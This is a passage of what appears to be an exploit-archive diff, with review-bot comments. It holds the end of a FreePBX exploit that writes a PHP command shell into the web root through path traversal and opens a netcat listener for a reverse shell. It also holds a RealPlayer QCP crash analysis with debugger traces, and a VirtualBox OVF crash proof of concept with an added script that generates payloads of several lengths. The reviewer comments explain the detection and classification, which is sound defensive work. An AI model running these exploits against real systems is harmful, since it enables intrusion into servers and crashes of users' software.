HEADERS = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0", "Accept": 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language":"en-US,en;q=0.5","Referer": args.url + 'admin/ajax.php', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1'}
print('\nPosting evil php')
postData = {'module':'hotelwakeup','command':'savecall','day':'now','time':'+1 week','destination':"/../../../../../../var/www/html/0x4148.php","language":cmdshell}
result = session.post(args.url + 'admin/ajax.php', headers=HEADERS, data=postData, verify=False)
if 'Whoops' not in result.text:
print(result.text)
print('\nSomething Went wrong. Was expecting a Whoops but none found.')
exit()
#calls the get thread which will execute 5 seconds after the netcat bind
print('\nStarting new thread for getting evil php')
z = threading.Thread(target=delayGet)
z.daemon = True
z.start()
print('\nBinding to socket '+ args.lport + ' Please wait... May take 30 secs to get call back.\n')
#This binds our terminal with netcat and waits for the call back
try:
subprocess.call('nc -nvlp '+args.lport, shell=True)
except Exception as e:
print(e)
print('\nIf you saw the message "sudo: no tty present and no askpass program specified", please try again and it may work.')
except Exception as e:
print(e)
print('\nSee above error')
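
Review bot: the `import requests` fallback uses a bare `except:` and then runs `pip install` from inside the exploit, which hides the real import error and is a surprising side effect for a PoC; a message telling the user to install requests is enough. `parser.add_help` on its own line is a no-op attribute access, `-s` is effectively required but not declared so, and the fallback usage message names `freepbx.py` while the docstring says `pbx.py`. The docstring lists "FreePBX 13 & 14 (System Recordings Module versions: 13.0.1beta1 - 13.0.26)" while the files.csv title says "FreePBX 10.13.66", which is the distro ISO build; the two should agree on what the affected version is. `verify=False` on every request disables certificate checking. The request itself is the detail defenders need: a POST to admin/ajax.php with module=hotelwakeup, command=savecall and a `destination` value containing ../ sequences, which is a path traversal that lets the module write attacker-supplied content under the web root; logging or filtering that combination is a straightforward detection.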

platforms/windows/dos/40617.txt Executable file

@ -0,0 +1,200 @@
Tested on: Win7 / Win10 x64
Date: October 20th 2016
Vendor homepage: http://www.real.com
Software link: http://realplayer-download.real.com/free/windows/installer/stubinst/stub/rt1/T10EUDRP/RealTimes-RealPlayer.exe
File version (both realplay.exe and qcpfformat.dll): 18.1.5.705
Exploit author: Alwin Peppels
Found with: Peach Fuzzer
Context:
eax=00000002 ebx=00000000 ecx=0d4cb9a0 edx=00000000 esi=00000000 edi=046abd0c
eip=534013dc esp=00d7e254 ebp=00d7e254 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
qcpfformat+0x13dc:
534013dc 0fb64203 movzx eax,byte ptr [edx+3] ds:002b:00000003=??
Call stack:
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 00d7e254 53401e92 00000000 00000000 0d4cb9a0 qcpfformat+0x13dc
01 00d7e2a4 53403342 046abd0c 80004005 00000000 qcpfformat+0x1e92
02 00d7e2d8 53402d37 1d26bbf0 74617276 534018a9 qcpfformat!RMACreateInstance+0xc62
03 00d7e308 534030cb 046abd0c 00000000 74617276 qcpfformat!RMACreateInstance+0x657
04 00d7e328 533e20f0 1ee51040 00000000 00000008 qcpfformat!RMACreateInstance+0x9eb
05 00d7e348 533e1da6 00000008 00d7e370 00000005 smplfsys+0x20f0
06 00d7e374 533e3582 00d7e394 00000000 00000000 smplfsys+0x1da6
07 00d7e38c 5340349f 00000000 00000008 00000000 smplfsys+0x3582
08 00d7e3b4 533e3cd9 00d7e3d0 0d4cb9a4 0d4cb9a4 qcpfformat!RMACreateInstance+0xdbf
09 00d7e3c8 53403597 00000000 00000000 00000000 smplfsys+0x3cd9
0a 00d7e444 533e283c 1d26bbf8 0d4cb9a4 0d4cb9a0 qcpfformat!RMACreateInstance+0xeb7
0b 00d7e460 53402c51 1d26bbf0 00000005 0d4cb9a0 smplfsys+0x283c
0c 00d7e488 57a8a692 1d190950 0ce86fd8 1d26bd48 qcpfformat!RMACreateInstance+0x571
0d 00d7e4f0 57a8adfd 0d49dd78 5865cb7c 00d7e528 mametadata!SetDLLAccessPath+0x18392
0e 00d7e568 585afd7c 0d4aca0c 046a2610 5865cb7c mametadata!SetDLLAccessPath+0x18afd
0f 00d7e5ac 585af1d0 1d26c088 00d7e5fc 00000000 rpcl3260!RMAShutdown+0x2584c
10 00d7e5c0 585ae90a 00000000 1d26c088 03ecd74c rpcl3260!RMAShutdown+0x24ca0
11 00d7e5d8 57c788ba 1d26c088 00d7e5fc 03ecd74c rpcl3260!RMAShutdown+0x243da
12 00d7e608 57c38009 1d26c088 00000002 1d26c088 rpmn3260!SetDLLAccessPath+0x58b1a
13 00d7e628 585bc25e 1d26c088 1d26c088 00000000 rpmn3260!SetDLLAccessPath+0x18269
Disassembly:
qcpfformat+0x13d0:
534013d0 55 push ebp
534013d1 8bec mov ebp,esp
534013d3 83794000 cmp dword ptr [ecx+40h],0
534013d7 8b5508 mov edx,dword ptr [ebp+8]
534013da 7422 je qcpfformat+0x13fe (534013fe)
534013dc 0fb64203 movzx eax,byte ptr [edx+3]
534013e0 0fb64a02 movzx ecx,byte ptr [edx+2]
534013e4 c1e008 shl eax,8
The edx register is being zeroed out by the move from ebp+8 at +13d7, causing the memory read at instruction 13dc to point to 0x00000003
In the analysis below the PoC files place in memory starts at 0b880012
Here the first VRAT tag (hex 76 72 61 74) is read in correctly the first time from 0b881044. As can be seen in the instructions above that, on the first iteration EBP is pointing at the tags but is quickly set to an address outside the file.
Breakpoint 1 hit
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
eip=54cd13d0 esp=00bce58c ebp=0b881040 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
qcpfformat+0x13d0:
54cd13d0 55 push ebp
0:000> t
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
eip=54cd13d1 esp=00bce588 ebp=0b881040 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
qcpfformat+0x13d1:
54cd13d1 8bec mov ebp,esp
0:000> t
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
eip=54cd13d3 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
qcpfformat+0x13d3:
54cd13d3 83794000 cmp dword ptr [ecx+40h],0 ds:002b:1c5342b0=00000001
0:000> t
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
eip=54cd13d7 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13d7:
54cd13d7 8b5508 mov edx,dword ptr [ebp+8] ss:002b:00bce590=0b881044
0:000> t
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13da esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13da:
54cd13da 7422 je qcpfformat+0x13fe (54cd13fe) [br=0]
0:000> t
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13dc esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13dc:
54cd13dc 0fb64203 movzx eax,byte ptr [edx+3] ds:002b:0b881047=74
0:000> t
eax=00000074 ebx=00bce5e8 ecx=1c534270 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13e0 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13e0:
54cd13e0 0fb64a02 movzx ecx,byte ptr [edx+2] ds:002b:0b881046=61
0:000> t
eax=00000074 ebx=00bce5e8 ecx=00000061 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13e4 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13e4:
54cd13e4 c1e008 shl eax,8
0:000> t
eax=00007400 ebx=00bce5e8 ecx=00000061 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13e7 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
qcpfformat+0x13e7:
54cd13e7 0bc1 or eax,ecx
0:000> t
eax=00007461 ebx=00bce5e8 ecx=00000061 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13e9 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13e9:
54cd13e9 0fb64a01 movzx ecx,byte ptr [edx+1] ds:002b:0b881045=72
0:000> t
eax=00007461 ebx=00bce5e8 ecx=00000072 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13ed esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13ed:
54cd13ed c1e008 shl eax,8
0:000> t
eax=00746100 ebx=00bce5e8 ecx=00000072 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13f0 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
qcpfformat+0x13f0:
54cd13f0 0bc1 or eax,ecx
0:000> t
eax=00746172 ebx=00bce5e8 ecx=00000072 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13f2 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
qcpfformat+0x13f2:
54cd13f2 0fb60a movzx ecx,byte ptr [edx] ds:002b:0b881044=76
0:000> t
eax=00746172 ebx=00bce5e8 ecx=00000076 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13f5 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
qcpfformat+0x13f5:
54cd13f5 c1e008 shl eax,8
So now both ESP and EBP are pointing outside the source file, causing the next iteration to read NULL into EDX, setting up the access violation:
eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
eip=54cd13d0 esp=00bce4d0 ebp=00bce51c iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000293
qcpfformat+0x13d0:
54cd13d0 55 push ebp
0:000> t
eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
eip=54cd13d1 esp=00bce4cc ebp=00bce51c iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000293
qcpfformat+0x13d1:
54cd13d1 8bec mov ebp,esp
0:000> t
eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
eip=54cd13d3 esp=00bce4cc ebp=00bce4cc iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000293
qcpfformat+0x13d3:
54cd13d3 83794000 cmp dword ptr [ecx+40h],0 ds:002b:1c5342b0=00000001
0:000> t
eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
eip=54cd13d7 esp=00bce4cc ebp=00bce4cc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13d7:
54cd13d7 8b5508 mov edx,dword ptr [ebp+8] ss:002b:00bce4d4=00000000
0:000> t
eax=00000002 ebx=00000000 ecx=1c534270 edx=00000000 esi=00000000 edi=04905784
eip=54cd13da esp=00bce4cc ebp=00bce4cc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13da:
54cd13da 7422 je qcpfformat+0x13fe (54cd13fe) [br=0]
0:000> t
eax=00000002 ebx=00000000 ecx=1c534270 edx=00000000 esi=00000000 edi=04905784
eip=54cd13dc esp=00bce4cc ebp=00bce4cc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13dc:
54cd13dc 0fb64203 movzx eax,byte ptr [edx+3] ds:002b:00000003=??
POC:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40617.zip
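
Review bot: the header has no title or affected-software line (only "Tested on", the date, vendor homepage and version), and "the PoC files place in memory" should read "file's place". The analysis text slightly misreads the trace: EBP is not meaningfully "pointing at the tags" on the first call, because the prologue immediately does `mov ebp,esp`; the value that matters is the first stack argument at [ebp+8], which is the tag pointer 0b881044 on the first call and 00000000 on the second, so the caller hands the parser a NULL pointer once the vrat chunk has been consumed. Likewise "both ESP and EBP are pointing outside the source file" is always true of stack registers. As shown this is a read from address 0x3 (a NULL-plus-offset dereference), so the advisory should state that it is a denial-of-service crash with no evidence of control over the read address or of a write; the "'.QCP' Crash (PoC)" title in files.csv is the right classification.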

platforms/windows/dos/40618.py Executable file

@ -0,0 +1,91 @@
#Exploit Title: Oracle VM VirtualBox 4.3.28 Crash
#Author: sultan albalawi
#Tested on:win7
#open viryualbox -->ctrl+i-->choose file -->double+double+double next
ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
ban+='\n'
ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
print(ban)

# Build the crash string: two "<http://AAAA...>" elements, each carrying a
# 19-byte run of 'A' (0x41) after the URL scheme, exactly as in the PoC.
pof1 = "<"
pof2 = "http://"
Crash = "\x41" * 19
pof3 = ">"
vm = pof1 + pof2 + Crash + pof3 + pof1 + pof2 + Crash + pof3

# Write the payload out as the .ovf file that is then opened in the target.
Crash_file = "Crach.ovf"
with open(Crash_file, "w") as fh:
    fh.write(vm)
print("file %s done" % Crash_file)
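The PoC above writes one file with a fixed 19-byte filler. When reproducing a crash like this, the first things a tester usually wants are the same payload at several lengths (to find the smallest input that still triggers the fault and to see whether a longer run changes the crash) and a record of what was actually written. The helper below is an added example, not part of the original PoC; the file names and the length list are my own choices, and the target application is not named on this page, so nothing here opens the files.

```python
# Added example (not from the original PoC): build the same "<http://AAAA...>"
# OVF payload at several filler lengths and write one file per length.
import os


def build_payload(length, repeats=2):
    """Return the crash string: `repeats` copies of "<http://" + "A"*length + ">".

    length=19, repeats=2 reproduces the payload of the original PoC.
    """
    if length < 0 or repeats < 1:
        raise ValueError("length must be >= 0 and repeats >= 1")
    return ("<http://" + "\x41" * length + ">") * repeats


def write_crash_file(path, length, repeats=2):
    """Write the payload for `length` to `path`; return the byte count written."""
    data = build_payload(length, repeats)
    with open(path, "w") as fh:
        fh.write(data)
    return len(data)


def sweep(directory, lengths=(19, 64, 256, 1024)):
    """Write one crash file per length into `directory` (file names are mine).

    Returns {path: bytes_written} so the tester can log exactly which inputs
    were tried against the target.
    """
    written = {}
    for n in lengths:
        path = os.path.join(directory, "crash_%d.ovf" % n)   # assumed naming
        written[path] = write_crash_file(path, n)
    return written


if __name__ == "__main__":
    for path, size in sorted(sweep(".").items()):
        print("%s: %d bytes" % (path, size))
```

Open each generated file in the target in turn, starting from the shortest; the first length that crashes it is the one to keep for the minimized reproducer, and the size recorded by `sweep` tells you what was on disk when it did.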